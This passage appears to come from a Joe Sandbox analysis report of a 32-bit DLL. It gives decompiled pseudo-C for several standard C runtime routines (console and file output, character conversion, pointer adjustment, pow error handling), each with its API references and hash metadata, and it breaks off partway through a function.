              				struct _OVERLAPPED* _t296;
              				void* _t299;
              				signed int _t300;
              				signed int _t302;
              				struct _OVERLAPPED* _t303;
              				signed char* _t306;
              				intOrPtr* _t307;
              				void* _t308;
              				signed int _t309;
              				long _t310;
              				signed int _t311;
              				signed int _t312;
              				signed int _t313;
              				void* _t314;
              				void* _t315;
              				void* _t316;
              
              				_push(0xffffffff);
              				_push(E6DAA2846);
              				_push( *[fs:0x0]);
              				_t315 = _t314 - 0x74;
              				_t177 =  *0x6dab3014; // 0x6c4e8ceb
              				_t178 = _t177 ^ _t313;
              				_v20 = _t178;
              				_push(_t178);
              				 *[fs:0x0] =  &_v16;
              				_t180 = _a8;
              				_t306 = _a12;
              				_t265 = _a20;
              				_t268 = (_t180 & 0x0000003f) * 0x38;
              				_t291 = _t180 >> 6;
              				_v100 = _t306;
              				_v64 = _t265;
              				_v84 = _t291;
              				_v72 = _t268;
              				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x6dad5858 + _t291 * 4)) + _t268 + 0x18));
              				_v88 = _a16 + _t306;
              				_t186 = GetConsoleOutputCP();
              				_t317 =  *((char*)(_t265 + 0x14));
              				_v116 = _t186;
              				if( *((char*)(_t265 + 0x14)) == 0) {
              					E6DA8F860(_t265, _t291, _t317);
              				}
              				_t307 = _a4;
              				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				_t190 = _v100;
              				_t292 = _t190;
              				_v52 = _t292;
              				if(_t190 < _v88) {
              					_t300 = _v72;
              					_t267 = 0;
              					_v76 = 0;
              					do {
              						_v53 =  *_t292;
              						_v68 = _t267;
              						_v48 = 1;
              						_t273 =  *(0x6dad5858 + _v84 * 4);
              						_v80 = _t273;
              						if(_v108 != 0xfde9) {
              							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
              							__eflags = _t195 & 0x00000004;
              							if((_t195 & 0x00000004) == 0) {
              								_t273 =  *_t292 & 0x000000ff;
              								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
              								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
              								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
              									_push(_v64);
              									_push(1);
              									_push(_t292);
              									goto L29;
              								} else {
              									_t217 =  &(_t292[1]);
              									_v60 = _t217;
              									__eflags = _t217 - _v88;
              									if(_t217 >= _v88) {
              										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
              										 *( *(0x6dad5858 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x6dad5858 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
              										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
              									} else {
              										_t224 = E6DA954AB(_t273, _t292,  &_v68, _t292, 2, _v64);
              										_t316 = _t315 + 0x10;
              										__eflags = _t224 - 0xffffffff;
              										if(_t224 != 0xffffffff) {
              											_t201 = _v60;
              											goto L31;
              										}
              									}
              								}
              							} else {
              								_push(_v64);
              								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
              								_t227 =  *_t292;
              								_v35 = _t227;
              								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
              								_push(2);
              								_push( &_v36);
              								L29:
              								_push( &_v68);
              								_t200 = E6DA954AB(_t273, _t292);
              								_t316 = _t315 + 0x10;
              								__eflags = _t200 - 0xffffffff;
              								if(_t200 != 0xffffffff) {
              									_t201 = _v52;
              									goto L31;
              								}
              							}
              						} else {
              							_t229 = _t267;
              							_t279 = _t273 + 0x2e + _t300;
              							while( *_t279 != _t267) {
              								_t229 =  &(_t229->Internal);
              								_t279 = _t279 + 1;
              								if(_t229 < 5) {
              									continue;
              								}
              								break;
              							}
              							_t302 = _v88 - _t292;
              							_v48 = _t229;
              							if(_t229 == 0) {
              								_t73 = ( *_t292 & 0x000000ff) + 0x6dab3900; // 0x0
              								_t281 =  *_t73 + 1;
              								_v80 = _t281;
              								__eflags = _t281 - _t302;
              								if(_t281 > _t302) {
              									__eflags = _t302;
              									if(_t302 <= 0) {
              										goto L44;
              									} else {
              										_t309 = _v72;
              										do {
              											 *((char*)( *(0x6dad5858 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
              											_t267 =  &(_t267->Internal);
              											__eflags = _t267 - _t302;
              										} while (_t267 < _t302);
              										goto L43;
              									}
              									L52:
              								} else {
              									_v132 = _t267;
              									__eflags = _t281 - 4;
              									_v128 = _t267;
              									_v60 = _t292;
              									_v48 = (_t281 == 4) + 1;
              									_t238 = E6DA9E2DE( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
              									_t316 = _t315 + 0x14;
              									__eflags = _t238 - 0xffffffff;
              									if(_t238 != 0xffffffff) {
              										_t240 =  &(_v52[_v80]);
              										__eflags = _t240;
              										_t300 = _v72;
              										goto L21;
              									}
              								}
              							} else {
              								_t285 = _v72;
              								_t243 = _v80 + 0x2e + _t285;
              								_v80 = _t243;
              								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x6dab3900)) + 1;
              								_v60 = _t246;
              								_t247 = _t246 - _v48;
              								_v76 = _t247;
              								if(_t247 > _t302) {
              									__eflags = _t302;
              									if(_t302 > 0) {
              										_t248 = _v52;
              										_t310 = _v48;
              										do {
              											_t286 =  *((intOrPtr*)(_t267 + _t248));
              											_t292 =  *(0x6dad5858 + _v84 * 4) + _t285 + _t267;
              											_t267 =  &(_t267->Internal);
              											_t292[_t310 + 0x2e] = _t286;
              											_t285 = _v72;
              											__eflags = _t267 - _t302;
              										} while (_t267 < _t302);
              										L43:
              										_t307 = _a4;
              									}
              									L44:
              									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
              								} else {
              									_t287 = _v48;
              									_t303 = _t267;
              									_t311 = _v80;
              									do {
              										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
              										_t303 =  &(_t303->Internal);
              										_t311 = _t311 + 1;
              									} while (_t303 < _t287);
              									_t304 = _v76;
              									if(_v76 > 0) {
              										E6DA8AB10( &_v28 + _t287, _t292, _t304);
              										_t287 = _v48;
              										_t315 = _t315 + 0xc;
              									}
              									_t300 = _v72;
              									_t296 = _t267;
              									_t312 = _v84;
              									do {
              										 *( *((intOrPtr*)(0x6dad5858 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
              										_t296 =  &(_t296->Internal);
              									} while (_t296 < _t287);
              									_t307 = _a4;
              									_v112 =  &_v28;
              									_v124 = _t267;
              									_v120 = _t267;
              									_v48 = (_v60 == 4) + 1;
              									_t258 = E6DA9E2DE( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
              									_t316 = _t315 + 0x14;
              									if(_t258 != 0xffffffff) {
              										_t240 =  &(_v52[_v76]);
              										L21:
              										_t201 = _t240 - 1;
              										L31:
              										_v52 = _t201 + 1;
              										_t205 = E6DA98F81(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
              										_t315 = _t316 + 0x20;
              										_v60 = _t205;
              										if(_t205 != 0) {
              											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
              												L50:
              												 *_t307 = GetLastError();
              											} else {
              												_t292 = _v52;
              												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
              												_v76 = _t210;
              												 *((intOrPtr*)(_t307 + 4)) = _t210;
              												if(_v96 >= _v60) {
              													if(_v53 != 0xa) {
              														goto L38;
              													} else {
              														_t212 = 0xd;
              														_v92 = _t212;
              														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
              															goto L50;
              														} else {
              															if(_v96 >= 1) {
              																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
              																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
              																_t292 = _v52;
              																_v76 =  *((intOrPtr*)(_t307 + 4));
              																goto L38;
              															}
              														}
              													}
              												}
              											}
              										}
              									}
              								}
              							}
              						}
              						goto L51;
              						L38:
              					} while (_t292 < _v88);
              				}
              				L51:
              				 *[fs:0x0] = _v16;
              				_pop(_t299);
              				_pop(_t308);
              				_pop(_t266);
              				return E6DA89B91(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
              				goto L52;
              			}
              0x6da9fe83
              0x6da9fe64
              0x6da9fe5a
              0x6da9fe3b
              0x6da9fe20
              0x6da9fd0e
              0x6da9fc89
              0x6da9fc5f
              0x00000000
              0x6da9fea2
              0x6da9fea2
              0x6da9feab
              0x6da9ff26
              0x6da9ff2b
              0x6da9ff33
              0x6da9ff34
              0x6da9ff35
              0x6da9ff41
              0x00000000

              APIs
              • GetConsoleOutputCP.KERNEL32(6C4E8CEB,?,00000000,?), ref: 6DA9FBD8
                • Part of subcall function 6DA98F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA97659,?,00000000,-00000008), ref: 6DA9902D
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6DA9FE33
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DA9FE7B
              • GetLastError.KERNEL32 ref: 6DA9FF1E
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 9671e62ca3c69a2b02c7bba29f9da7ab402fb30b711d34cbddfc8ca461f86663
              • Instruction ID: 84e37442454f29bde58b2160e63c2f8858fba6e6983ff3edc45f44dc3cc54ec1
              • Opcode Fuzzy Hash: 9671e62ca3c69a2b02c7bba29f9da7ab402fb30b711d34cbddfc8ca461f86663
              • Instruction Fuzzy Hash: 99D15A75D186599FCB01CFA8C880AEDBBF5FF09314F18852EE965EB245D730A982CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E6DA8C588(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				signed int* _t52;
              				signed int _t53;
              				intOrPtr _t54;
              				signed int _t58;
              				signed int _t61;
              				intOrPtr _t71;
              				signed int _t75;
              				signed int _t79;
              				signed int _t81;
              				signed int _t84;
              				signed int _t85;
              				signed int _t97;
              				signed int* _t98;
              				signed char* _t101;
              				signed int _t107;
              				void* _t111;
              
              				_push(0x10);
              				_push(0x6dab11e0);
              				E6DA89CA0(__ebx, __edi, __esi);
              				_t75 = 0;
              				_t52 =  *(_t111 + 0x10);
              				_t81 = _t52[1];
              				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
              					L30:
              					_t53 = 0;
              					__eflags = 0;
              					goto L31;
              				} else {
              					_t97 = _t52[2];
              					if(_t97 != 0 ||  *_t52 < 0) {
              						_t84 =  *_t52;
              						_t107 =  *(_t111 + 0xc);
              						if(_t84 >= 0) {
              							_t107 = _t107 + 0xc + _t97;
              						}
              						 *(_t111 - 4) = _t75;
              						_t101 =  *(_t111 + 0x14);
              						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
              							L10:
              							_t54 =  *((intOrPtr*)(_t111 + 8));
              							__eflags = _t84 & 0x00000008;
              							if((_t84 & 0x00000008) == 0) {
              								__eflags =  *_t101 & 0x00000001;
              								if(( *_t101 & 0x00000001) == 0) {
              									_t84 =  *(_t54 + 0x18);
              									__eflags = _t101[0x18] - _t75;
              									if(_t101[0x18] != _t75) {
              										__eflags = _t84;
              										if(_t84 == 0) {
              											goto L32;
              										} else {
              											__eflags = _t107;
              											if(_t107 == 0) {
              												goto L32;
              											} else {
              												__eflags =  *_t101 & 0x00000004;
              												_t79 = 0;
              												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
              												__eflags = _t75;
              												 *(_t111 - 0x20) = _t75;
              												goto L29;
              											}
              										}
              									} else {
              										__eflags = _t84;
              										if(_t84 == 0) {
              											goto L32;
              										} else {
              											__eflags = _t107;
              											if(_t107 == 0) {
              												goto L32;
              											} else {
              												E6DA8AB10(_t107, E6DA8A8AF(_t84,  &(_t101[8])), _t101[0x14]);
              												goto L29;
              											}
              										}
              									}
              								} else {
              									__eflags =  *(_t54 + 0x18);
              									if( *(_t54 + 0x18) == 0) {
              										goto L32;
              									} else {
              										__eflags = _t107;
              										if(_t107 == 0) {
              											goto L32;
              										} else {
              											E6DA8AB10(_t107,  *(_t54 + 0x18), _t101[0x14]);
              											__eflags = _t101[0x14] - 4;
              											if(_t101[0x14] == 4) {
              												__eflags =  *_t107;
              												if( *_t107 != 0) {
              													_push( &(_t101[8]));
              													_push( *_t107);
              													goto L21;
              												}
              											}
              											goto L29;
              										}
              									}
              								}
              							} else {
              								_t84 =  *(_t54 + 0x18);
              								goto L12;
              							}
              						} else {
              							_t71 =  *0x6dad54e4; // 0x0
              							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
              							if(_t71 == 0) {
              								goto L10;
              							} else {
              								 *0x6daa415c();
              								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
              								L12:
              								if(_t84 == 0 || _t107 == 0) {
              									L32:
              									E6DA90BF9(_t75, _t84, _t97, _t101, _t107);
              									asm("int3");
              									_push(8);
              									_push(0x6dab1200);
              									E6DA89CA0(_t75, _t101, _t107);
              									_t98 =  *(_t111 + 0x10);
              									_t85 =  *(_t111 + 0xc);
              									__eflags =  *_t98;
              									if(__eflags >= 0) {
              										_t103 = _t85 + 0xc + _t98[2];
              										__eflags = _t85 + 0xc + _t98[2];
              									} else {
              										_t103 = _t85;
              									}
              									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
              									_t108 =  *(_t111 + 0x14);
              									_push( *(_t111 + 0x14));
              									_push(_t98);
              									_push(_t85);
              									_t77 =  *((intOrPtr*)(_t111 + 8));
              									_push( *((intOrPtr*)(_t111 + 8)));
              									_t58 = E6DA8C588(_t77, _t103, _t108, __eflags) - 1;
              									__eflags = _t58;
              									if(_t58 == 0) {
              										_t61 = E6DA8D288(_t103, _t108[0x18], E6DA8A8AF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
              									} else {
              										_t61 = _t58 - 1;
              										__eflags = _t61;
              										if(_t61 == 0) {
              											_t61 = E6DA8D298(_t103, _t108[0x18], E6DA8A8AF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
              										}
              									}
              									 *(_t111 - 4) = 0xfffffffe;
              									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
              									return _t61;
              								} else {
              									 *_t107 = _t84;
              									_push( &(_t101[8]));
              									_push(_t84);
              									L21:
              									 *_t107 = E6DA8A8AF();
              									L29:
              									 *(_t111 - 4) = 0xfffffffe;
              									_t53 = _t75;
              									L31:
              									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
              									return _t53;
              								}
              							}
              						}
              					} else {
              						goto L30;
              					}
              				}
              			}




















              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: AdjustPointer
              • String ID:
              • API String ID: 1740715915-0
              • Opcode ID: fbfadba9bab8c391f54a26716dc31590541c867dc6f8b32b225631b79761cb85
              • Instruction ID: 019639104f1065aa07f3a947da39e264e405049fbbb5c066236f059bff659a90
              • Opcode Fuzzy Hash: fbfadba9bab8c391f54a26716dc31590541c867dc6f8b32b225631b79761cb85
              • Instruction Fuzzy Hash: CC51B07660C2029FEB198F14D940BBA77A5FF44314F145639EE1657292E731E8D1CF90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA99272(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
              				intOrPtr _t17;
              				intOrPtr _t18;
              				intOrPtr _t20;
              				intOrPtr _t30;
              				char _t32;
              				intOrPtr _t40;
              				intOrPtr* _t42;
              				intOrPtr _t43;
              
              				_t42 = _a4;
              				if(_t42 != 0) {
              					_t32 = 0;
              					__eflags =  *_t42;
              					if( *_t42 != 0) {
              						_t17 = E6DA98F81(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
              						__eflags = _t17;
              						if(_t17 != 0) {
              							_t40 = _a8;
              							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
              							if(__eflags <= 0) {
              								L11:
              								_t18 = E6DA90DEA(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
              								__eflags = _t18;
              								if(_t18 != 0) {
              									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
              									_t20 = 0;
              									__eflags = 0;
              								} else {
              									E6DA903A9(GetLastError());
              									_t20 =  *((intOrPtr*)(E6DA90403()));
              								}
              								L14:
              								return _t20;
              							}
              							_t20 = E6DA99814(_t40, __eflags, _t17);
              							__eflags = _t20;
              							if(_t20 != 0) {
              								goto L14;
              							}
              							goto L11;
              						}
              						E6DA903A9(GetLastError());
              						return  *((intOrPtr*)(E6DA90403()));
              					}
              					_t43 = _a8;
              					__eflags =  *((intOrPtr*)(_t43 + 0xc));
              					if(__eflags != 0) {
              						L6:
              						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
              						L2:
              						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
              						return 0;
              					}
              					_t30 = E6DA99814(_t43, __eflags, 1);
              					__eflags = _t30;
              					if(_t30 != 0) {
              						return _t30;
              					}
              					goto L6;
              				}
              				_t43 = _a8;
              				E6DA90E0E(_t43);
              				_t32 = 0;
              				 *((intOrPtr*)(_t43 + 8)) = 0;
              				 *((intOrPtr*)(_t43 + 0xc)) = 0;
              				goto L2;
              			}












              APIs
                • Part of subcall function 6DA98F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA97659,?,00000000,-00000008), ref: 6DA9902D
              • GetLastError.KERNEL32 ref: 6DA992D6
              • __dosmaperr.LIBCMT ref: 6DA992DD
              • GetLastError.KERNEL32(?,?,?,?), ref: 6DA99317
              • __dosmaperr.LIBCMT ref: 6DA9931E
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: 0dd029f0e3b76ab020b8f3c337269331d99a179a1badf8b1287fda12cb2d5937
              • Instruction ID: c1665d09b6c338071b9bef9e23ad4afa8aab74162fd84efe229aecffccd2ccec
              • Opcode Fuzzy Hash: 0dd029f0e3b76ab020b8f3c337269331d99a179a1badf8b1287fda12cb2d5937
              • Instruction Fuzzy Hash: DE21AF3162C206BF9B109F66CA8096BB7FDFF45368B459519E9189F240DB34EC808BA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA90D0B(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
              				void* _t15;
              				void* _t16;
              				intOrPtr _t18;
              				intOrPtr _t38;
              				intOrPtr* _t40;
              				intOrPtr _t41;
              
              				_t40 = _a4;
              				if(_t40 != 0) {
              					if( *_t40 != 0) {
              						_t15 = E6DA98F81(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
              						if(_t15 != 0) {
              							_t38 = _a8;
              							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
              								L10:
              								_t16 = E6DA90DEA(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
              								if(_t16 != 0) {
              									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
              									_t18 = 0;
              								} else {
              									E6DA903A9(GetLastError());
              									_t18 =  *((intOrPtr*)(E6DA90403()));
              								}
              								L13:
              								L14:
              								return _t18;
              							}
              							_t18 = E6DA90E28(_t38, _t15);
              							if(_t18 != 0) {
              								goto L13;
              							}
              							goto L10;
              						}
              						E6DA903A9(GetLastError());
              						_t18 =  *((intOrPtr*)(E6DA90403()));
              						goto L14;
              					}
              					_t41 = _a8;
              					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
              						L5:
              						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
              						_t18 = 0;
              						 *((intOrPtr*)(_t41 + 0x10)) = 0;
              						goto L14;
              					}
              					_t18 = E6DA90E28(_t41, 1);
              					if(_t18 != 0) {
              						goto L14;
              					}
              					goto L5;
              				}
              				E6DA90EAD(_a8);
              				return 0;
              			}










              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: affda1a3cf3d9fd9d204e8a4b73b6aa7ec7188775d8bc253aca928bdcaac0047
              • Instruction ID: 28e34ca2ab7cb3b3d435f7fb47dbd6276b503086171530f091e1a6f53089bf66
              • Opcode Fuzzy Hash: affda1a3cf3d9fd9d204e8a4b73b6aa7ec7188775d8bc253aca928bdcaac0047
              • Instruction Fuzzy Hash: 6221CF3762D216AF9B109F66C95095B77FDAF413E87068515FA18DF140DB30FC8187A8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DAA1C86(void* _a4, long _a8, DWORD* _a12) {
              				void* _t13;
              
              				_t13 = WriteConsoleW( *0x6dab3a00, _a4, _a8, _a12, 0);
              				if(_t13 == 0 && GetLastError() == 6) {
              					E6DAA1C6F();
              					E6DAA1C31();
              					_t13 = WriteConsoleW( *0x6dab3a00, _a4, _a8, _a12, _t13);
              				}
              				return _t13;
              			}





              APIs
              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6DAA1132,?,00000001,?,?,?,6DA9FF72,?,?,00000000), ref: 6DAA1C9D
              • GetLastError.KERNEL32(?,6DAA1132,?,00000001,?,?,?,6DA9FF72,?,?,00000000,?,?,?,6DAA04FB,?), ref: 6DAA1CA9
                • Part of subcall function 6DAA1C6F: CloseHandle.KERNEL32(FFFFFFFE,6DAA1CB9,?,6DAA1132,?,00000001,?,?,?,6DA9FF72,?,?,00000000,?,?), ref: 6DAA1C7F
              • ___initconout.LIBCMT ref: 6DAA1CB9
                • Part of subcall function 6DAA1C31: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6DAA1C60,6DAA111F,?,?,6DA9FF72,?,?,00000000,?), ref: 6DAA1C44
              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6DAA1132,?,00000001,?,?,?,6DA9FF72,?,?,00000000,?), ref: 6DAA1CCE
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: f303f2307e51ff0ec5cd4b4ea01dfef8526bd86c8f97068528c9088c558ea02e
              • Instruction ID: 6f452d2ba57c5b2c0c8b7a65a7c5738bc864ddec934375ea17fedba8c13c7245
              • Opcode Fuzzy Hash: f303f2307e51ff0ec5cd4b4ea01dfef8526bd86c8f97068528c9088c558ea02e
              • Instruction Fuzzy Hash: 56F03736508265BFCF121F91CD18B9D3F76FB09360B1A8514FA1D96120CB328861DB91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 6DA90A9D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorHandling__start
              • String ID: pow
              • API String ID: 3213639722-2276729525
              • Opcode ID: 63733fa271e572a50d0150c6ab1634762a98ee3902b755b884491f536515fccb
              • Instruction ID: 78ed9879b08c9c2383c11401faa7ca78078fef87b3a906fda0954d8c2b7fbc11
              • Opcode Fuzzy Hash: 63733fa271e572a50d0150c6ab1634762a98ee3902b755b884491f536515fccb
              • Instruction Fuzzy Hash: 6A515B75A3C30386CB027B39C95137E3BF4EB41790F29CD59E4A48E598EB35C4C18A9A
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E6DA8C200(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
              				char _v5;
              				signed int _v12;
              				char _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				char _v32;
              				char _t52;
              				signed int _t59;
              				intOrPtr _t60;
              				void* _t61;
              				intOrPtr* _t62;
              				intOrPtr _t64;
              				intOrPtr _t67;
              				intOrPtr _t72;
              				intOrPtr* _t76;
              				intOrPtr _t77;
              				signed int _t81;
              				char _t83;
              				intOrPtr _t86;
              				intOrPtr _t93;
              				intOrPtr _t96;
              				intOrPtr* _t98;
              				void* _t102;
              				void* _t104;
              				void* _t111;
              
              				_t89 = __edx;
              				_t76 = _a4;
              				_push(__edi);
              				_v5 = 0;
              				_v16 = 1;
              				 *_t76 = E6DAA227E(__ecx,  *_t76);
              				_t77 = _a8;
              				_t6 = _t77 + 0x10; // 0x11
              				_t96 = _t6;
              				_push(_t96);
              				_v20 = _t96;
